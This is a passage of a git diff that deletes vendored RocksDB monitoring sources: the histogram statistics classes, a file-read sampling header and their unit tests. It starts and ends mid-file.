-  wbf->ReserveMem(2 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 49 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 49 * 1024 * 1024 + 10000);
-
-  wbf->FreeMem(16 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 48 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 48 * 1024 * 1024 + 10000);
-
-  // Destory write buffer manger should free everything
-  wbf.reset();
-  ASSERT_LT(cache->GetPinnedUsage(), 1024 * 1024);
-}
-
-TEST_F(WriteBufferManagerTest, NoCapCacheCost) {
-  // 1GB cache
-  std::shared_ptr<Cache> cache = NewLRUCache(1024 * 1024 * 1024, 4);
-  // A write buffer manager of size 256MB
-  std::unique_ptr<WriteBufferManager> wbf(new WriteBufferManager(0, cache));
-  // Allocate 1.5MB will allocate 2MB
-  wbf->ReserveMem(10 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 10 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 10 * 1024 * 1024 + 10000);
-  ASSERT_FALSE(wbf->ShouldFlush());
-
-  wbf->FreeMem(9 * 1024 * 1024);
-  for (int i = 0; i < 10; i++) {
-    wbf->FreeMem(16 * 1024);
-  }
-  ASSERT_GE(cache->GetPinnedUsage(), 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 1024 * 1024 + 10000);
-}
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/monitoring/file_read_sample.h b/thirdparty/rocksdb/monitoring/file_read_sample.h
deleted file mode 100644
index 9ad7d2f..0000000
--- a/thirdparty/rocksdb/monitoring/file_read_sample.h
+++ /dev/null
@@ -1,23 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "db/version_edit.h"
-#include "util/random.h"
-
-namespace rocksdb {
-static const uint32_t kFileReadSampleRate = 1024;
-extern bool should_sample_file_read();
-extern void sample_file_read_inc(FileMetaData*);
-
-inline bool should_sample_file_read() {
-  return (Random::GetTLSInstance()->Next() % kFileReadSampleRate == 307);
-}
-
-inline void sample_file_read_inc(FileMetaData* meta) {
-  meta->stats.num_reads_sampled.fetch_add(kFileReadSampleRate,
-                                          std::memory_order_relaxed);
-}
-}
diff --git a/thirdparty/rocksdb/monitoring/histogram.cc b/thirdparty/rocksdb/monitoring/histogram.cc
deleted file mode 100644
index b3c01a7..0000000
--- a/thirdparty/rocksdb/monitoring/histogram.cc
+++ /dev/null
@@ -1,287 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "monitoring/histogram.h"
-
-#include <inttypes.h>
-#include <cassert>
-#include <math.h>
-#include <stdio.h>
-
-#include "port/port.h"
-#include "util/cast_util.h"
-
-namespace rocksdb {
-
-HistogramBucketMapper::HistogramBucketMapper() {
-  // If you change this, you also need to change
-  // size of array buckets_ in HistogramImpl
-  bucketValues_ = {1, 2};
-  valueIndexMap_ = {{1, 0}, {2, 1}};
-  double bucket_val = static_cast<double>(bucketValues_.back());
-  while ((bucket_val = 1.5 * bucket_val) <= static_cast<double>(port::kMaxUint64)) {
-    bucketValues_.push_back(static_cast<uint64_t>(bucket_val));
-    // Extracts two most significant digits to make histogram buckets more
-    // human-readable. E.g., 172 becomes 170.
-    uint64_t pow_of_ten = 1;
-    while (bucketValues_.back() / 10 > 10) {
-      bucketValues_.back() /= 10;
-      pow_of_ten *= 10;
-    }
-    bucketValues_.back() *= pow_of_ten;
-    valueIndexMap_[bucketValues_.back()] = bucketValues_.size() - 1;
-  }
-  maxBucketValue_ = bucketValues_.back();
-  minBucketValue_ = bucketValues_.front();
-}
-
-size_t HistogramBucketMapper::IndexForValue(const uint64_t value) const {
-  if (value >= maxBucketValue_) {
-    return bucketValues_.size() - 1;
-  } else if ( value >= minBucketValue_ ) {
-    std::map<uint64_t, uint64_t>::const_iterator lowerBound =
-      valueIndexMap_.lower_bound(value);
-    if (lowerBound != valueIndexMap_.end()) {
-      return static_cast<size_t>(lowerBound->second);
-    } else {
-      return 0;
-    }
-  } else {
-    return 0;
-  }
-}
-
-namespace {
-  const HistogramBucketMapper bucketMapper;
-}
-
-HistogramStat::HistogramStat()
-  : num_buckets_(bucketMapper.BucketCount()) {
-  assert(num_buckets_ == sizeof(buckets_) / sizeof(*buckets_));
-  Clear();
-}
-
-void HistogramStat::Clear() {
-  min_.store(bucketMapper.LastValue(), std::memory_order_relaxed);
-  max_.store(0, std::memory_order_relaxed);
-  num_.store(0, std::memory_order_relaxed);
-  sum_.store(0, std::memory_order_relaxed);
-  sum_squares_.store(0, std::memory_order_relaxed);
-  for (unsigned int b = 0; b < num_buckets_; b++) {
-    buckets_[b].store(0, std::memory_order_relaxed);
-  }
-};
-
-bool HistogramStat::Empty() const { return num() == 0; }
-
-void HistogramStat::Add(uint64_t value) {
-  // This function is designed to be lock free, as it's in the critical path
-  // of any operation. Each individual value is atomic and the order of updates
-  // by concurrent threads is tolerable.
-  const size_t index = bucketMapper.IndexForValue(value);
-  assert(index < num_buckets_);
-  buckets_[index].store(buckets_[index].load(std::memory_order_relaxed) + 1,
-                        std::memory_order_relaxed);
-
-  uint64_t old_min = min();
-  if (value < old_min) {
-    min_.store(value, std::memory_order_relaxed);
-  }
-
-  uint64_t old_max = max();
-  if (value > old_max) {
-    max_.store(value, std::memory_order_relaxed);
-  }
-
-  num_.store(num_.load(std::memory_order_relaxed) + 1,
-             std::memory_order_relaxed);
-  sum_.store(sum_.load(std::memory_order_relaxed) + value,
-             std::memory_order_relaxed);
-  sum_squares_.store(
-      sum_squares_.load(std::memory_order_relaxed) + value * value,
-      std::memory_order_relaxed);
-}
-
-void HistogramStat::Merge(const HistogramStat& other) {
-  // This function needs to be performned with the outer lock acquired
-  // However, atomic operation on every member is still need, since Add()
-  // requires no lock and value update can still happen concurrently
-  uint64_t old_min = min();
-  uint64_t other_min = other.min();
-  while (other_min < old_min &&
-         !min_.compare_exchange_weak(old_min, other_min)) {}
-
-  uint64_t old_max = max();
-  uint64_t other_max = other.max();
-  while (other_max > old_max &&
-         !max_.compare_exchange_weak(old_max, other_max)) {}
-
-  num_.fetch_add(other.num(), std::memory_order_relaxed);
-  sum_.fetch_add(other.sum(), std::memory_order_relaxed);
-  sum_squares_.fetch_add(other.sum_squares(), std::memory_order_relaxed);
-  for (unsigned int b = 0; b < num_buckets_; b++) {
-    buckets_[b].fetch_add(other.bucket_at(b), std::memory_order_relaxed);
-  }
-}
-
-double HistogramStat::Median() const {
-  return Percentile(50.0);
-}
-
-double HistogramStat::Percentile(double p) const {
-  double threshold = num() * (p / 100.0);
-  uint64_t cumulative_sum = 0;
-  for (unsigned int b = 0; b < num_buckets_; b++) {
-    uint64_t bucket_value = bucket_at(b);
-    cumulative_sum += bucket_value;
-    if (cumulative_sum >= threshold) {
-      // Scale linearly within this bucket
-      uint64_t left_point = (b == 0) ? 0 : bucketMapper.BucketLimit(b-1);
-      uint64_t right_point = bucketMapper.BucketLimit(b);
-      uint64_t left_sum = cumulative_sum - bucket_value;
-      uint64_t right_sum = cumulative_sum;
-      double pos = 0;
-      uint64_t right_left_diff = right_sum - left_sum;
-      if (right_left_diff != 0) {
-       pos = (threshold - left_sum) / right_left_diff;
-      }
-      double r = left_point + (right_point - left_point) * pos;
-      uint64_t cur_min = min();
-      uint64_t cur_max = max();
-      if (r < cur_min) r = static_cast<double>(cur_min);
-      if (r > cur_max) r = static_cast<double>(cur_max);
-      return r;
-    }
-  }
-  return static_cast<double>(max());
-}
-
-double HistogramStat::Average() const {
-  uint64_t cur_num = num();
-  uint64_t cur_sum = sum();
-  if (cur_num == 0) return 0;
-  return static_cast<double>(cur_sum) / static_cast<double>(cur_num);
-}
-
-double HistogramStat::StandardDeviation() const {
-  uint64_t cur_num = num();
-  uint64_t cur_sum = sum();
-  uint64_t cur_sum_squares = sum_squares();
-  if (cur_num == 0) return 0;
-  double variance =
-      static_cast<double>(cur_sum_squares * cur_num - cur_sum * cur_sum) /
-      static_cast<double>(cur_num * cur_num);
-  return sqrt(variance);
-}
-std::string HistogramStat::ToString() const {
-  uint64_t cur_num = num();
-  std::string r;
-  char buf[1650];
-  snprintf(buf, sizeof(buf),
-           "Count: %" PRIu64 " Average: %.4f  StdDev: %.2f\n",
-           cur_num, Average(), StandardDeviation());
-  r.append(buf);
-  snprintf(buf, sizeof(buf),
-           "Min: %" PRIu64 "  Median: %.4f  Max: %" PRIu64 "\n",
-           (cur_num == 0 ? 0 : min()), Median(), (cur_num == 0 ? 0 : max()));
-  r.append(buf);
-  snprintf(buf, sizeof(buf),
-           "Percentiles: "
-           "P50: %.2f P75: %.2f P99: %.2f P99.9: %.2f P99.99: %.2f\n",
-           Percentile(50), Percentile(75), Percentile(99), Percentile(99.9),
-           Percentile(99.99));
-  r.append(buf);
-  r.append("------------------------------------------------------\n");
-  const double mult = 100.0 / cur_num;
-  uint64_t cumulative_sum = 0;
-  for (unsigned int b = 0; b < num_buckets_; b++) {
-    uint64_t bucket_value = bucket_at(b);
-    if (bucket_value <= 0.0) continue;
-    cumulative_sum += bucket_value;
-    snprintf(buf, sizeof(buf),
-             "[ %7" PRIu64 ", %7" PRIu64 " ) %8" PRIu64 " %7.3f%% %7.3f%% ",
-             (b == 0) ? 0 : bucketMapper.BucketLimit(b-1),  // left
-              bucketMapper.BucketLimit(b),  // right
-              bucket_value,                   // count
-             (mult * bucket_value),           // percentage
-             (mult * cumulative_sum));       // cumulative percentage
-    r.append(buf);
-
-    // Add hash marks based on percentage; 20 marks for 100%.
-    size_t marks = static_cast<size_t>(mult * bucket_value / 5 + 0.5);
-    r.append(marks, '#');
-    r.push_back('\n');
-  }
-  return r;
-}
-
-void HistogramStat::Data(HistogramData * const data) const {
-  assert(data);
-  data->median = Median();
-  data->percentile95 = Percentile(95);
-  data->percentile99 = Percentile(99);
-  data->max = static_cast<double>(max());
-  data->average = Average();
-  data->standard_deviation = StandardDeviation();
-}
-
-void HistogramImpl::Clear() {
-  std::lock_guard<std::mutex> lock(mutex_);
-  stats_.Clear();
-}
-
-bool HistogramImpl::Empty() const {
-  return stats_.Empty();
-}
-
-void HistogramImpl::Add(uint64_t value) {
-  stats_.Add(value);
-}
-
-void HistogramImpl::Merge(const Histogram& other) {
-  if (strcmp(Name(), other.Name()) == 0) {
-    Merge(
-        *static_cast_with_check<const HistogramImpl, const Histogram>(&other));
-  }
-}
-
-void HistogramImpl::Merge(const HistogramImpl& other) {
-  std::lock_guard<std::mutex> lock(mutex_);
-  stats_.Merge(other.stats_);
-}
-
-double HistogramImpl::Median() const {
-  return stats_.Median();
-}
-
-double HistogramImpl::Percentile(double p) const {
-  return stats_.Percentile(p);
-}
-
-double HistogramImpl::Average() const {
-  return stats_.Average();
-}
-
-double HistogramImpl::StandardDeviation() const {
- return stats_.StandardDeviation();
-}
-
-std::string HistogramImpl::ToString() const {
-  return stats_.ToString();
-}
-
-void HistogramImpl::Data(HistogramData * const data) const {
-  stats_.Data(data);
-}
-
-} // namespace levedb
diff --git a/thirdparty/rocksdb/monitoring/histogram.h b/thirdparty/rocksdb/monitoring/histogram.h
deleted file mode 100644
index 6bf2e9e..0000000
--- a/thirdparty/rocksdb/monitoring/histogram.h
+++ /dev/null
@@ -1,149 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include "rocksdb/statistics.h"
-
-#include <cassert>
-#include <string>
-#include <vector>
-#include <map>
-#include <mutex>
-
-namespace rocksdb {
-
-class HistogramBucketMapper {
- public:
-
-  HistogramBucketMapper();
-
-  // converts a value to the bucket index.
-  size_t IndexForValue(uint64_t value) const;
-  // number of buckets required.
-
-  size_t BucketCount() const {
-    return bucketValues_.size();
-  }
-
-  uint64_t LastValue() const {
-    return maxBucketValue_;
-  }
-
-  uint64_t FirstValue() const {
-    return minBucketValue_;
-  }
-
-  uint64_t BucketLimit(const size_t bucketNumber) const {
-    assert(bucketNumber < BucketCount());
-    return bucketValues_[bucketNumber];
-  }
-
- private:
-  std::vector<uint64_t> bucketValues_;
-  uint64_t maxBucketValue_;
-  uint64_t minBucketValue_;
-  std::map<uint64_t, uint64_t> valueIndexMap_;
-};
-
-struct HistogramStat {
-  HistogramStat();
-  ~HistogramStat() {}
-
-  HistogramStat(const HistogramStat&) = delete;
-  HistogramStat& operator=(const HistogramStat&) = delete;
-
-  void Clear();
-  bool Empty() const;
-  void Add(uint64_t value);
-  void Merge(const HistogramStat& other);
-
-  inline uint64_t min() const { return min_.load(std::memory_order_relaxed); }
-  inline uint64_t max() const { return max_.load(std::memory_order_relaxed); }
-  inline uint64_t num() const { return num_.load(std::memory_order_relaxed); }
-  inline uint64_t sum() const { return sum_.load(std::memory_order_relaxed); }
-  inline uint64_t sum_squares() const {
-    return sum_squares_.load(std::memory_order_relaxed);
-  }
-  inline uint64_t bucket_at(size_t b) const {
-    return buckets_[b].load(std::memory_order_relaxed);
-  }
-
-  double Median() const;
-  double Percentile(double p) const;
-  double Average() const;
-  double StandardDeviation() const;
-  void Data(HistogramData* const data) const;
-  std::string ToString() const;
-
-  // To be able to use HistogramStat as thread local variable, it
-  // cannot have dynamic allocated member. That's why we're
-  // using manually values from BucketMapper
-  std::atomic_uint_fast64_t min_;
-  std::atomic_uint_fast64_t max_;
-  std::atomic_uint_fast64_t num_;
-  std::atomic_uint_fast64_t sum_;
-  std::atomic_uint_fast64_t sum_squares_;
-  std::atomic_uint_fast64_t buckets_[109]; // 109==BucketMapper::BucketCount()
-  const uint64_t num_buckets_;
-};
-
-class Histogram {
-public:
-  Histogram() {}
-  virtual ~Histogram() {};
-
-  virtual void Clear() = 0;
-  virtual bool Empty() const = 0;
-  virtual void Add(uint64_t value) = 0;
-  virtual void Merge(const Histogram&) = 0;
-
-  virtual std::string ToString() const = 0;
-  virtual const char* Name() const = 0;
-  virtual uint64_t min() const = 0;
-  virtual uint64_t max() const = 0;
-  virtual uint64_t num() const = 0;
-  virtual double Median() const = 0;
-  virtual double Percentile(double p) const = 0;
-  virtual double Average() const = 0;
-  virtual double StandardDeviation() const = 0;
-  virtual void Data(HistogramData* const data) const = 0;
-};
-
-class HistogramImpl : public Histogram {
- public:
-  HistogramImpl() { Clear(); }
-
-  HistogramImpl(const HistogramImpl&) = delete;
-  HistogramImpl& operator=(const HistogramImpl&) = delete;
-
-  virtual void Clear() override;
-  virtual bool Empty() const override;
-  virtual void Add(uint64_t value) override;
-  virtual void Merge(const Histogram& other) override;
-  void Merge(const HistogramImpl& other);
-
-  virtual std::string ToString() const override;
-  virtual const char* Name() const override { return "HistogramImpl"; }
-  virtual uint64_t min() const override { return stats_.min(); }
-  virtual uint64_t max() const override { return stats_.max(); }
-  virtual uint64_t num() const override { return stats_.num(); }
-  virtual double Median() const override;
-  virtual double Percentile(double p) const override;
-  virtual double Average() const override;
-  virtual double StandardDeviation() const override;
-  virtual void Data(HistogramData* const data) const override;
-
-  virtual ~HistogramImpl() {}
-
- private:
-  HistogramStat stats_;
-  std::mutex mutex_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/histogram_test.cc b/thirdparty/rocksdb/monitoring/histogram_test.cc
deleted file mode 100644
index b4e3c98..0000000
--- a/thirdparty/rocksdb/monitoring/histogram_test.cc
+++ /dev/null
@@ -1,208 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <cmath>
-
-#include "monitoring/histogram.h"
-#include "monitoring/histogram_windowing.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class HistogramTest : public testing::Test {};
-
-namespace {
-  const double kIota = 0.1;
-  const HistogramBucketMapper bucketMapper;
-  Env* env = Env::Default();
-}
-
-void PopulateHistogram(Histogram& histogram,
-             uint64_t low, uint64_t high, uint64_t loop = 1) {
-  for (; loop > 0; loop--) {
-    for (uint64_t i = low; i <= high; i++) {
-      histogram.Add(i);
-    }
-  }
-}
-
-void BasicOperation(Histogram& histogram) {
-  PopulateHistogram(histogram, 1, 110, 10); // fill up to bucket [70, 110)
-
-  HistogramData data;
-  histogram.Data(&data);
-
-  ASSERT_LE(fabs(histogram.Percentile(100.0) - 110.0), kIota);
-  ASSERT_LE(fabs(data.percentile99 - 108.9), kIota);  // 99 * 110 / 100
-  ASSERT_LE(fabs(data.percentile95 - 104.5), kIota);  // 95 * 110 / 100
-  ASSERT_LE(fabs(data.median - 55.0), kIota);  // 50 * 110 / 100
-  ASSERT_EQ(data.average, 55.5);  // (1 + 110) / 2
-}
-
-void MergeHistogram(Histogram& histogram, Histogram& other) {
-  PopulateHistogram(histogram, 1, 100);
-  PopulateHistogram(other, 101, 250);
-  histogram.Merge(other);
-
-  HistogramData data;
-  histogram.Data(&data);
-
-  ASSERT_LE(fabs(histogram.Percentile(100.0) - 250.0), kIota);
-  ASSERT_LE(fabs(data.percentile99 - 247.5), kIota);  // 99 * 250 / 100
-  ASSERT_LE(fabs(data.percentile95 - 237.5), kIota);  // 95 * 250 / 100
-  ASSERT_LE(fabs(data.median - 125.0), kIota);  // 50 * 250 / 100
-  ASSERT_EQ(data.average, 125.5);  // (1 + 250) / 2
-}
-
-void EmptyHistogram(Histogram& histogram) {
-  ASSERT_EQ(histogram.min(), bucketMapper.LastValue());
-  ASSERT_EQ(histogram.max(), 0);
-  ASSERT_EQ(histogram.num(), 0);
-  ASSERT_EQ(histogram.Median(), 0.0);
-  ASSERT_EQ(histogram.Percentile(85.0), 0.0);
-  ASSERT_EQ(histogram.Average(), 0.0);
-  ASSERT_EQ(histogram.StandardDeviation(), 0.0);
-}
-
-void ClearHistogram(Histogram& histogram) {
-  for (uint64_t i = 1; i <= 100; i++) {
-    histogram.Add(i);
-  }
-  histogram.Clear();
-  ASSERT_TRUE(histogram.Empty());
-  ASSERT_EQ(histogram.Median(), 0);
-  ASSERT_EQ(histogram.Percentile(85.0), 0);
-  ASSERT_EQ(histogram.Average(), 0);
-}
-
-TEST_F(HistogramTest, BasicOperation) {
-  HistogramImpl histogram;
-  BasicOperation(histogram);
-
-  HistogramWindowingImpl histogramWindowing;
-  BasicOperation(histogramWindowing);
-}
-
-TEST_F(HistogramTest, MergeHistogram) {
-  HistogramImpl histogram;
-  HistogramImpl other;
-  MergeHistogram(histogram, other);
-
-  HistogramWindowingImpl histogramWindowing;
-  HistogramWindowingImpl otherWindowing;
-  MergeHistogram(histogramWindowing, otherWindowing);
-}
-
-TEST_F(HistogramTest, EmptyHistogram) {
-  HistogramImpl histogram;
-  EmptyHistogram(histogram);
-
-  HistogramWindowingImpl histogramWindowing;
-  EmptyHistogram(histogramWindowing);
-}
-
-TEST_F(HistogramTest, ClearHistogram) {
-  HistogramImpl histogram;
-  ClearHistogram(histogram);
-
-  HistogramWindowingImpl histogramWindowing;
-  ClearHistogram(histogramWindowing);
-}
-
-TEST_F(HistogramTest, HistogramWindowingExpire) {
-  uint64_t num_windows = 3;
-  int micros_per_window = 1000000;
-  uint64_t min_num_per_window = 0;
-
-  HistogramWindowingImpl
-      histogramWindowing(num_windows, micros_per_window, min_num_per_window);
-
-  PopulateHistogram(histogramWindowing, 1, 1, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 100);
-  ASSERT_EQ(histogramWindowing.min(), 1);
-  ASSERT_EQ(histogramWindowing.max(), 1);
-  ASSERT_EQ(histogramWindowing.Average(), 1);
-
-  PopulateHistogram(histogramWindowing, 2, 2, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 200);
-  ASSERT_EQ(histogramWindowing.min(), 1);
-  ASSERT_EQ(histogramWindowing.max(), 2);
-  ASSERT_EQ(histogramWindowing.Average(), 1.5);
-
-  PopulateHistogram(histogramWindowing, 3, 3, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 300);
-  ASSERT_EQ(histogramWindowing.min(), 1);
-  ASSERT_EQ(histogramWindowing.max(), 3);
-  ASSERT_EQ(histogramWindowing.Average(), 2.0);
-
-  // dropping oldest window with value 1, remaining 2 ~ 4
-  PopulateHistogram(histogramWindowing, 4, 4, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 300);
-  ASSERT_EQ(histogramWindowing.min(), 2);
-  ASSERT_EQ(histogramWindowing.max(), 4);
-  ASSERT_EQ(histogramWindowing.Average(), 3.0);
-
-  // dropping oldest window with value 2, remaining 3 ~ 5
-  PopulateHistogram(histogramWindowing, 5, 5, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 300);
-  ASSERT_EQ(histogramWindowing.min(), 3);
-  ASSERT_EQ(histogramWindowing.max(), 5);
-  ASSERT_EQ(histogramWindowing.Average(), 4.0);
-}
-
-TEST_F(HistogramTest, HistogramWindowingMerge) {
-  uint64_t num_windows = 3;
-  int micros_per_window = 1000000;
-  uint64_t min_num_per_window = 0;
-
-  HistogramWindowingImpl
-      histogramWindowing(num_windows, micros_per_window, min_num_per_window);
-  HistogramWindowingImpl
-      otherWindowing(num_windows, micros_per_window, min_num_per_window);
-
-  PopulateHistogram(histogramWindowing, 1, 1, 100);
-  PopulateHistogram(otherWindowing, 1, 1, 100);
-  env->SleepForMicroseconds(micros_per_window);
-
-  PopulateHistogram(histogramWindowing, 2, 2, 100);
-  PopulateHistogram(otherWindowing, 2, 2, 100);
-  env->SleepForMicroseconds(micros_per_window);
-
-  PopulateHistogram(histogramWindowing, 3, 3, 100);
-  PopulateHistogram(otherWindowing, 3, 3, 100);
-  env->SleepForMicroseconds(micros_per_window);
-
-  histogramWindowing.Merge(otherWindowing);
-  ASSERT_EQ(histogramWindowing.num(), 600);
-  ASSERT_EQ(histogramWindowing.min(), 1);
-  ASSERT_EQ(histogramWindowing.max(), 3);
-  ASSERT_EQ(histogramWindowing.Average(), 2.0);
-
-  // dropping oldest window with value 1, remaining 2 ~ 4
-  PopulateHistogram(histogramWindowing, 4, 4, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 500);
-  ASSERT_EQ(histogramWindowing.min(), 2);
-  ASSERT_EQ(histogramWindowing.max(), 4);
-
-  // dropping oldest window with value 2, remaining 3 ~ 5
-  PopulateHistogram(histogramWindowing, 5, 5, 100);
-  env->SleepForMicroseconds(micros_per_window);
-  ASSERT_EQ(histogramWindowing.num(), 400);
-  ASSERT_EQ(histogramWindowing.min(), 3);
-  ASSERT_EQ(histogramWindowing.max(), 5);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/monitoring/histogram_windowing.cc b/thirdparty/rocksdb/monitoring/histogram_windowing.cc
deleted file mode 100644
index 28d8265..0000000
--- a/thirdparty/rocksdb/monitoring/histogram_windowing.cc
+++ /dev/null
@@ -1,197 +0,0 @@
-//  Copyright (c) 2013, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "monitoring/histogram_windowing.h"
-#include "monitoring/histogram.h"
-#include "util/cast_util.h"
-
-#include <algorithm>
-
-namespace rocksdb {
-
-HistogramWindowingImpl::HistogramWindowingImpl() {
-  env_ = Env::Default();
-  window_stats_.reset(new HistogramStat[num_windows_]);
-  Clear();
-}
-
-HistogramWindowingImpl::HistogramWindowingImpl(
-    uint64_t num_windows,
-    uint64_t micros_per_window,
-    uint64_t min_num_per_window) :
-      num_windows_(num_windows),
-      micros_per_window_(micros_per_window),
-      min_num_per_window_(min_num_per_window) {
-  env_ = Env::Default();
-  window_stats_.reset(new HistogramStat[num_windows_]);
-  Clear();
-}
-
-HistogramWindowingImpl::~HistogramWindowingImpl() {
-}
-
-void HistogramWindowingImpl::Clear() {
-  std::lock_guard<std::mutex> lock(mutex_);
-
-  stats_.Clear();
-  for (size_t i = 0; i < num_windows_; i++) {
-    window_stats_[i].Clear();
-  }
-  current_window_.store(0, std::memory_order_relaxed);
-  last_swap_time_.store(env_->NowMicros(), std::memory_order_relaxed);
-}
-
-bool HistogramWindowingImpl::Empty() const { return stats_.Empty(); }
-
-// This function is designed to be lock free, as it's in the critical path
-// of any operation.
-// Each individual value is atomic, it is just that some samples can go
-// in the older bucket which is tolerable.
-void HistogramWindowingImpl::Add(uint64_t value){
-  TimerTick();
-
-  // Parent (global) member update
-  stats_.Add(value);
-
-  // Current window update
-  window_stats_[current_window()].Add(value);
-}
-
-void HistogramWindowingImpl::Merge(const Histogram& other) {
-  if (strcmp(Name(), other.Name()) == 0) {
-    Merge(
-        *static_cast_with_check<const HistogramWindowingImpl, const Histogram>(
-            &other));
-  }
-}
-
-void HistogramWindowingImpl::Merge(const HistogramWindowingImpl& other) {
-  std::lock_guard<std::mutex> lock(mutex_);
-  stats_.Merge(other.stats_);
-
-  if (stats_.num_buckets_ != other.stats_.num_buckets_ ||
-      micros_per_window_ != other.micros_per_window_) {
-    return;
-  }
-
-  uint64_t cur_window = current_window();
-  uint64_t other_cur_window = other.current_window();
-  // going backwards for alignment
-  for (unsigned int i = 0;
-                    i < std::min(num_windows_, other.num_windows_); i++) {
-    uint64_t window_index =
-        (cur_window + num_windows_ - i) % num_windows_;
-    uint64_t other_window_index =
-        (other_cur_window + other.num_windows_ - i) % other.num_windows_;
-
-    window_stats_[window_index].Merge(other.window_stats_[other_window_index]);
-  }
-}
-
-std::string HistogramWindowingImpl::ToString() const {
-  return stats_.ToString();
-}
-
-double HistogramWindowingImpl::Median() const {
-  return Percentile(50.0);
-}
-
-double HistogramWindowingImpl::Percentile(double p) const {
-  // Retry 3 times in total
-  for (int retry = 0; retry < 3; retry++) {
-    uint64_t start_num = stats_.num();
-    double result = stats_.Percentile(p);
-    // Detect if swap buckets or Clear() was called during calculation
-    if (stats_.num() >= start_num) {
-      return result;
-    }
-  }
-  return 0.0;
-}
-
-double HistogramWindowingImpl::Average() const {
-  return stats_.Average();
-}
-
-double HistogramWindowingImpl::StandardDeviation() const {
-  return stats_.StandardDeviation();
-}
-
-void HistogramWindowingImpl::Data(HistogramData * const data) const {
-  stats_.Data(data);
-}
-
-void HistogramWindowingImpl::TimerTick() {
-  uint64_t curr_time = env_->NowMicros();
-  if (curr_time - last_swap_time() > micros_per_window_ &&
-      window_stats_[current_window()].num() >= min_num_per_window_) {
-    SwapHistoryBucket();
-  }
-}
-
-void HistogramWindowingImpl::SwapHistoryBucket() {
-  // Threads executing Add() would be competing for this mutex, the first one
-  // who got the metex would take care of the bucket swap, other threads
-  // can skip this.
-  // If mutex is held by Merge() or Clear(), next Add() will take care of the
-  // swap, if needed.
-  if (mutex_.try_lock()) {
-    last_swap_time_.store(env_->NowMicros(), std::memory_order_relaxed);
-
-    uint64_t curr_window = current_window();
-    uint64_t next_window = (curr_window == num_windows_ - 1) ?
-                                                    0 : curr_window + 1;
-
-    // subtract next buckets from totals and swap to next buckets
-    HistogramStat& stats_to_drop = window_stats_[next_window];
-
-    if (!stats_to_drop.Empty()) {
-      for (size_t b = 0; b < stats_.num_buckets_; b++){
-        stats_.buckets_[b].fetch_sub(
-            stats_to_drop.bucket_at(b), std::memory_order_relaxed);
-      }
-
-      if (stats_.min() == stats_to_drop.min()) {
-        uint64_t new_min = std::numeric_limits<uint64_t>::max();
-        for (unsigned int i = 0; i < num_windows_; i++) {
-          if (i != next_window) {
-            uint64_t m = window_stats_[i].min();
-            if (m < new_min) new_min = m;
-          }
-        }
-        stats_.min_.store(new_min, std::memory_order_relaxed);
-      }
-
-      if (stats_.max() == stats_to_drop.max()) {
-        uint64_t new_max = 0;
-        for (unsigned int i = 0; i < num_windows_; i++) {
-          if (i != next_window) {
-            uint64_t m = window_stats_[i].max();
-            if (m > new_max) new_max = m;
-          }
-        }
-        stats_.max_.store(new_max, std::memory_order_relaxed);
-      }
-
-      stats_.num_.fetch_sub(stats_to_drop.num(), std::memory_order_relaxed);
-      stats_.sum_.fetch_sub(stats_to_drop.sum(), std::memory_order_relaxed);
-      stats_.sum_squares_.fetch_sub(
-                  stats_to_drop.sum_squares(), std::memory_order_relaxed);
-
-      stats_to_drop.Clear();
